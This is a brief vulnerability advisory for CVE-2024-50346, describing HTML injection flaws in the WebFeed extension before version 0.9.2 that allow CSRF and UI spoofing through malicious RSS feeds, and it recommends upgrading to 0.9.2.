CVE-2024-50346

Name of the Vulnerable Software and Affected Versions: WebFeed versions prior to 0.9.2

Description: The issue concerns multiple HTML injection vulnerabilities that can lead to CSRF and UI spoofing attacks. A remote attacker can provide malicious RSS feeds, attracting the victim user to visit them using WebFeed. The attacker can then inject malicious HTML into the extension page, fooling the victim into sending out HTTP requests to arbitrary sites with the victim's credentials. Users are vulnerable to CSRF attacks when visiting malicious RSS feeds via WebFeed, potentially executing unwanted actions on the user's behalf on arbitrary websites.

Recommendations: For versions prior to 0.9.2, upgrade to release version 0.9.2 to address the issue. As a temporary workaround, consider avoiding the use of WebFeed to access potentially malicious RSS feeds until the upgrade is applied. Restrict access to WebFeed's functionality to minimize the risk of exploitation.